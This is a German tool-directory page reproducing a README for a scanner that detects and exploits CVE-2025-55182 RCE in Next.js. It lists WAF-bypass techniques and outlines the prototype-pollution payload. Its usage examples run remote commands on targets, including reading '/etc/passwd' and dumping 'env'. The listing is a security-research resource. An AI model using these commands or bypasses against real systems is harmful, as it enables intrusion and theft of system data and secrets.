Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
React2Shell-CVE-2025-55182-Advanced-Scanner — Automatisierter Scanner für CVE-2025-55182 RCE in Next.js mit 8 WAF-Bypass-Techniken, benutzerdefinierter Befehlsausführung und einem reinen Erkennungsmodus für autorisierte Penetrationstests. | Kitploit
Tools/GitHubGitHub/ysfcndgr/react2shell-cve-2025-55182-advanced-scanner
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsCommand and Control
GitHubysfcndgr/react2shell-cve-2025-55182-advanced-scanner

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

React2Shell-CVE-2025-55182-Advanced-Scanner

Automatisierter Scanner für CVE-2025-55182 RCE in Next.js mit 8 WAF-Bypass-Techniken, benutzerdefinierter Befehlsausführung und einem reinen Erkennungsmodus für autorisierte Penetrationstests.

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

CVE-2025-55182 Erweiterter Scanner

Python License Security

Erweitertes Penetrationstest-Tool zur Erkennung und Ausnutzung der CVE-2025-55182-Schwachstelle in Next.js-Anwendungen

📋 Inhaltsverzeichnis Übersicht

Funktionen

Installation

Verwendung

Beispiele

Bypass-Techniken

Technische Details

Haftungsausschluss

Mitwirken

Lizenz

🔍 Übersicht CVE-2025-55182 ist eine kritische Schwachstelle zur Remote-Code-Ausführung (RCE), die Next.js-Anwendungen über React Server Components betrifft. Dieser Scanner bietet eine automatisierte Möglichkeit, diese Schwachstelle mithilfe verschiedener WAF-Bypass-Techniken zu erkennen und auszunutzen.

CVSS-Score: 9.8 (Kritisch)

✨ Funktionen Mehrere Payload-Varianten: Verschiedene Ausnutzungsmuster

WAF-Bypass-Techniken: 8 verschiedene Bypass-Methoden

Benutzerdefinierte Befehlsausführung: Beliebige Systembefehle ausführen

Schwachstellentests: Nur-Test-Modus für sichere Erkennung

Proxy-Unterstützung: Datenverkehr zum Debugging über einen Proxy leiten

SSL-Bypass: Option zum Überspringen der SSL-Zertifikatsprüfung

Wiederholungsmechanismus: Automatischer Wiederholungsversuch bei Fehlern

Farbige Ausgabe: Gut lesbare Konsolenoberfläche

🚀 Installation Voraussetzungen Python 3.6 oder höher

pip-Paketmanager

Install dependencies

pip install -r requirements.txt

Make the script executable (Linux/Mac)

chmod +x scanner.py Docker-Installation bash

Build Docker image

docker build -t cve-2025-55182-scanner .

Run with Docker

docker run --rm cve-2025-55182-scanner -h 📖 Verwendung Grundlegende Verwendung bash

Show help

python scanner.py -h

Test a target

python scanner.py -d http://target.com --test-only

Execute command

python scanner.py -d http://target.com -c "whoami" Befehlszeilenoptionen Option Beschreibung Standard -d, --domain Ziel-URL http://localhost:3000 -c, --command Auszuführender Befehl id -t, --technique Bypass-Technik (1-8) 1 -p, --proxy Proxy-Server None -k, --insecure SSL-Prüfung überspringen False --test-only Nur auf Schwachstelle testen False -h, --help Hilfemeldung anzeigen N/A 📚 Beispiele Grundlegende Ausnutzung bash

Test if target is vulnerable

python scanner.py -d http://vulnapp.com --test-only

Execute simple command

python scanner.py -d http://vulnapp.com -c "id"

List directory contents

python scanner.py -d https://target.com -c "ls -la" -k

Read system file

python scanner.py -d http://localhost:3000 -c "cat /etc/passwd" WAF-Bypass-Beispiele bash

Use Base64 encoding bypass

python scanner.py -d http://target.com -c "uname -a" -t 2

Use Unicode encoding

python scanner.py -d https://target.com -c "whoami" -t 3 -k

Use mixed techniques with proxy

python scanner.py -d http://target.com -c "pwd" -t 4 -p http://127.0.0.1:8080

Try all techniques automatically

for i in {1..8}; do echo "Trying technique $i" python scanner.py -d http://target.com -c "hostname" -t $i echo "" done Erweiterte Verwendung bash

Test multiple targets from file

for target in $(cat targets.txt); do echo "Testing $target" python scanner.py -d $target --test-only done

Save output to file

python scanner.py -d http://target.com -c "ifconfig" > output.txt

Use with Burp Suite proxy

python scanner.py -d https://target.com -c "env" -p http://127.0.0.1:8080 -k 🛡️ Bypass-Techniken Der Scanner umfasst 8 verschiedene WAF-Bypass-Techniken:

Standard-Payload: Ursprüngliches Ausnutzungsmuster

Base64-Kodierung: Befehle in Base64 kodieren

Unicode-Kodierung: Unicode-Zeichenkodierung verwenden

Groß-/Kleinschreibungs-Manipulation: Zufällige Schreibvarianten

Doppelte Kodierung: Doppelte URL-Kodierung

Null-Bytes: Nullbyte-Injektion

Gemischte Header: Variierte HTTP-Header

Zufällige Verzögerungen: Zufällige Warteintervalle einfügen

Jede Technik kann mit dem Flag -t ausgewählt werden.

🔧 Technische Details Hintergrund der Schwachstelle CVE-2025-55182 ist eine Prototype-Pollution-Schwachstelle in Next.js, die über React Server Components zu Remote-Code-Ausführung führt. Die Schwachstelle ermöglicht es Angreifern, beliebige Befehle auf dem Server auszuführen.

Aufbau des Payloads Das Tool verwendet eine speziell präparierte multipart/form-data-Anfrage mit Prototype Pollution, um RCE zu erreichen:

Prototype Pollution: Verschmutzt die Promise-Prototypenkette

Befehlsinjektion: Injiziert die Ausführung von Node.js child_process

Ergebnis-Extraktion: Extrahiert Ergebnisse über Weiterleitungs-Header

Erkennungsmethode Der Scanner sendet speziell präparierte Anfragen und sucht nach:

X-Action-Redirect-Header, die Befehlsausgaben enthalten

Bestimmte Antwortmuster, die auf eine erfolgreiche Ausnutzung hinweisen

Fehlermeldungen, die auf das Vorhandensein der Schwachstelle hindeuten

⚠️ Haftungsausschluss WICHTIG: NUR FÜR LEGALE UND ETHISCHE NUTZUNG

Dieses Tool wird bereitgestellt für:

Sicherheitsforschung und -bildung

Autorisierte Penetrationstests

Schwachstellenbewertung mit entsprechender Genehmigung

Defensive Sicherheitszwecke

VERWENDEN SIE DIESES TOOL NICHT FÜR:

Nicht autorisierte Tests von Systemen

Illegale Aktivitäten

Böswillige Zwecke

Verstoß gegen Nutzungsbedingungen

Durch die Verwendung dieses Tools stimmen Sie zu:

Es nur auf Systemen zu verwenden, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung zum Testen haben

Alle geltenden Gesetze und Vorschriften einzuhalten

Die volle Verantwortung für Ihre Handlungen zu übernehmen

Den Autor für jeglichen Missbrauch nicht haftbar zu machen

🤝 Mitwirken Beiträge sind willkommen! So können Sie helfen:

Probleme melden Prüfen, ob das Problem bereits besteht

Detaillierte Reproduktionsschritte angeben

Fehlermeldungen und Protokolle einfügen

Geben Sie Ihre Umgebungsdetails an

Code-Beiträge Repository forken

Einen Feature-Branch erstellen

Klare Commit-Nachrichten schreiben

Falls zutreffend Tests hinzufügen

Einen Pull-Request einreichen

Funktionsanfragen Schlagen Sie neue Funktionen über GitHub-Issues mit dem Label „enhancement“ vor.

📄 Lizenz Dieses Projekt ist unter der MIT-Lizenz lizenziert - Details finden Sie in der LICENSE-Datei.

MIT-Lizenz

Copyright (c) 2025

Hiermit wird unentgeltlich jeder Person, die eine Kopie dieser Software und der zugehörigen Dokumentationsdateien (die „Software“) erhält, die Erlaubnis erteilt, uneingeschränkt mit der Software zu handeln, einschließlich und ohne Ausnahme der Rechte, die Software zu verwenden, zu kopieren, zu modifizieren, zusammenzuführen, zu veröffentlichen, zu verbreiten, zu unterlizenzieren und/oder zu verkaufen, und Personen, denen die Software zur Verfügung gestellt wird, dies zu gestatten, unter den folgenden Bedingungen:

Der obige Urheberrechtshinweis und dieser Genehmigungshinweis müssen in allen Kopien oder wesentlichen Teilen der Software enthalten sein.

DIE SOFTWARE WIRD OHNE JEGLICHE AUSDRÜCKLICHE ODER STILLSCHWEIGENDE GARANTIE BEREITGESTELLT, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF DIE GARANTIE DER MARKTGÄNGIGKEIT, DER EIGNUNG FÜR EINEN BESTIMMTEN ZWECK UND DER NICHTVERLETZUNG VON RECHTEN DRITTER. IN KEINEM FALL SIND DIE AUTOREN ODER URHEBERRECHTSINHABER FÜR ANSPRÜCHE, SCHÄDEN ODER ANDERE VERBINDLICHKEITEN HAFTBAR, SEI ES IM RAHMEN EINES VERTRAGS, EINER UNERLAUBTEN HANDLUNG ODER ANDERWEITIG, DIE AUS ODER IM ZUSAMMENHANG MIT DER SOFTWARE ODER DER VERWENDUNG ODER ANDEREN VERWENDUNGEN DER SOFTWARE ENTSTEHEN. 🔗 Referenzen Offizieller Eintrag zu CVE-2025-55182

ProjectDiscovery-Nuclei-Vorlage

Next.js-Sicherheitshinweise

Dokumentation zu React Server Components

⭐ Sternverlauf Wenn Sie dieses Tool nützlich finden, geben Sie ihm bitte einen Stern auf GitHub!

Denken Sie daran: Mit großer Macht kommt große Verantwortung. Verwenden Sie dieses Tool ethisch und legal.

Tool herunterladen